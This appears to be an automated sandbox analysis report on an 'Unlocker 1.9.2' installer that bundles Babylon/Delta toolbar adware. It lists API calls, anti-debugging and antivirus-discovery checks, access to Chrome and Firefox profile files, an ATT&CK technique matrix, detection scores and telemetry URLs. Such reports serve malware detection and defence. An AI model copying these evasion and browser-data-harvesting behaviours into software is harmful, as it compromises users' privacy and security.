Source: Setup.exe, 00000002.00000002.359689566.0000000000838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeCode function: 1_2_009A3BC5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_009A3BC5
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0049D9C0 CreateToolhelp32Snapshot,GetCurrentProcessId,Process32FirstW,Process32NextW,FindCloseChangeNotification,2_2_0049D9C0
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405CFF
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0044F1DA IsProcessorFeaturePresent,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapAlloc,InterlockedCompareExchange,GetProcessHeap,HeapFree,2_2_0044F1DA
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeCode function: 1_2_009A3BC5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_009A3BC5
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0045567D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0045567D
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0044F6C8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0044F6C8
Source: Setup.exeBinary or memory string: Progman
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: GetLocaleInfoW,2_2_00502490
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_00452455 GetSystemTimeAsFileTime,__aulldiv,2_2_00452455
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_004059FF GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_004059FF
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: Unlocker1.9.2.exe, 00000000.00000003.373205075.0000000000732000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.297608040.000000000280E000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373387708.0000000000735000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000002.373842768.0000000000736000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UnlockerAssistant.exe
Source: Unlocker1.9.2.exe, 00000000.00000003.373205075.0000000000732000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.297608040.000000000280E000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373387708.0000000000735000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000002.373842768.0000000000736000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Software\Microsoft\Windows\CurrentVersion\App Paths\Unlocker.exe
Source: Unlocker1.9.2.exe, 00000000.00000003.352167331.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.354488333.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Start Unlocker.lnk.0.drBinary or memory string: C:\Program Files\Unlocker\Unlocker.exe
Source: Unlocker1.9.2.exe, 00000000.00000003.351057801.0000000000796000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Unlocker\Unlocker.exe
Source: Unlocker1.9.2.exe, 00000000.00000003.373205075.0000000000732000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.297608040.000000000280E000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373387708.0000000000735000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000002.373842768.0000000000736000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Unlocker.exe
Source: Unlocker1.9.2.exe, 00000000.00000003.373205075.0000000000732000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.297608040.000000000280E000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373387708.0000000000735000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000002.373842768.0000000000736000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \UnlockerAssistant.exe
Source: Setup.exe, 00000002.00000002.359689566.0000000000838000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.359689566.0000000000835000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Start Unlocker.lnk.0.drBinary or memory string: C:\Program Files\Unlocker\Unlocker.exe>..\..\..\..\..\..\..\..\..\Program Files\Unlocker\Unlocker.exe
Source: Unlocker1.9.2.exe, 00000000.00000003.352167331.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.354488333.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373205075.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.354488333.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.352167331.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373341873.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000002.373897948.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Start Unlocker.lnk.0.drBinary or memory string: Unlocker.exe

Stealing of Sensitive Information

Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferencesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journalJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
Default Accounts | 2 Native API | 21 Windows Service | 21 Windows Service | 2 Obfuscated Files or Information | 111 Input Capture | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | 11 Registry Run Keys / Startup Folder | 2 Process Injection | 1 Software Packing | Security Account Manager | 25 System Information Discovery | SMB/Windows Admin Shares | 111 Input Capture | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | 11 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | NTDS | 251 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 2 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 3 Masquerading | LSA Secrets | 3 Process Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Process Injection | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Regsvr32 | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
[Behavior Graph: ID 810721; Sample: Unlocker1.9.2.exe; Startdate: 17/02/2023; Architecture: WINDOWS; Score: 48]

Source | Detection | Scanner | Label
Unlocker1.9.2.exe | 55% | ReversingLabs |
Unlocker1.9.2.exe | 44% | Virustotal |
Unlocker1.9.2.exe | 100% | Avira | APPL/Toolbar.Babylon.10785

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\DeltaTB.exe | 100% | Joe Sandbox ML |
C:\Program Files\Unlocker\UnlockerInject32.exe | 100% | Joe Sandbox ML |
C:\Program Files\Unlocker\Unlocker.exe | 2% | ReversingLabs |
C:\Program Files\Unlocker\UnlockerCOM.dll | 0% | ReversingLabs |
C:\Program Files\Unlocker\UnlockerDriver5.sys | 0% | ReversingLabs |
C:\Program Files\Unlocker\UnlockerInject32.exe | 0% | ReversingLabs |
C:\Program Files\Unlocker\uninst.exe | 2% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\BExternal.dll | 5% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\IEHelper.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\BExternal.dll | 5% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\IEHelper.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\setup.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\sqlite3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe | 23% | ReversingLabs | Win32.PUA.Presenoker
C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\sqlite3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\DeltaTB.exe | 44% | ReversingLabs | Win32.PUA.Presenoker
C:\Users\user\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsv5446.tmp\LangDLL.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsv5446.tmp\System.dll | 0% | ReversingLabs |

Source | Detection | Scanner | Label
0.3.Unlocker1.9.2.exe.7c2a98.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.0.Unlocker1.9.2.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223487
0.2.Unlocker1.9.2.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223487

Source | Detection | Scanner | Label
dl.babylon-services.com | 0% | Virustotal |
stp.babylon-services.com | 0% | Virustotal |
stat.babylon-services.com | 1% | Virustotal |
stat.info-stream.net | 3% | Virustotal |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
dl.babylon-services.com | 198.143.175.67 | true | false | | unknown
stp.babylon-services.com | 184.154.27.232 | true | false | | unknown
stat.babylon-services.com | 184.154.27.232 | true | false | | unknown
stp.babylon.com | unknown | unknown | false | | high
dl.babylon.com | unknown | unknown | false | | high
stat.info-stream.net | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-start&stage=0&ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0 | true | Avira URL Cloud: safe | unknown
http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-end&stage=91&ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0&hp=1&dsp=1&tb=1&hpx=0&dspx=0&rvrt=0&excd=0&stm=2&nvs=0&dnld=100&dcnt=1&dtot=1&dlerr=200&dltm=0&dlsz=3844&dsflr=0&errurl=Setup2.zpb&hpc=1998245871&spc=1998245871&tbx=0 | true | Avira URL Cloud: safe | unknown
                                                                          high
                                                                          http://unlocker.emptyloop.com/CeUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                            high
                                                                            http://www.babylon.com/redirects/redir.cgi?no_policy=1&type=%s&lang=%d9.1.1.10HPTBDSPukieffcrver=&&mDeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drfalse
                                                                              high
                                                                              http://babylon.com=rundll32.exe, 00000003.00000002.347884515.00000000033FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              low
                                                                              http://info.babylon.com/stat/client_ga.php?name=$DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360644771.0000000002387000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343726697.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344438579.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343213411.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342989828.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342313026.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344897131.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342737496.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345307808.0000000002317000.00000004.00000020.00020000.00000000.sdmp, 
Setup.exe, 00000002.00000003.344737594.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345130958.0000000002317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=1224711588Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358551623.000000000237A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357867781.0000000002371000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360615970.000000000237C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358204631.0000000002372000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358754148.000000000237A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 
00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://babylon.comCrundll32.exe, 00000003.00000002.347884515.00000000033FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://bis.babylon.com/FSetup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://unlocker.emptyloop.com/MesejUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                                    high
                                                                                    http://www.babylon.com/redirects/redir.cgi?Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                                      high
                                                                                      http://www.my-online-search.com/9.2.exerefoxSetup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://utils.babylon.com/country/DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                                        high
                                                                                        http://unlocker.emptyloop.com/TaUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                                          high
                                                                                          http://www.babylon.com/redirects/client.cgi?Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                                            high
                                                                                            http://www.my-online-search.com/?q=Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://babylon.com/rundll32.exe, 00000003.00000002.347884515.0000000003415000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.347884515.0000000003428000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://unlocker.emptyloop.com/KyUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                                                high
                                                                                                http://clients.babylon.com/pro/kms6.cgiDeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                                                  high
                                                                                                  http://unlocker.emptyloop.comUnlocker1.9.2.exe, 00000000.00000003.352261412.0000000005101000.00000004.00000020.00020000.00000000.sdmp, README.TXT.0.drfalse
                                                                                                    high
                                                                                                    http://info.babylon.com/welcome/DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                                                      high
                                                                                                      http://www.babylon.com/redirects/redir.cgi?type=machinetrans3Setup.exe, 00000002.00000003.358323085.000000000236F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://unlocker.emptyloop.com/ToUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                                                          high
                                                                                                          http://babylon.comSetup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.347884515.0000000003415000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.347884515.00000000033FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.347884515.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.348386397.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                                                            high
                                                                                                            http://unlocker.emptyloop.com/EsteUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                                                              high
                                                                                                              http://unlocker.emptyloop.com/TatoUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                                                                high
                                                                                                                http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-end&stage=111&ver=9.1.1.10&afSetup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://unlocker.emptyloop.com/????Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                                                                  high
                                                                                                                  http://unlocker.emptyloop.com/EstaUnlocker.exe.0.drfalse
                                                                                                                    high
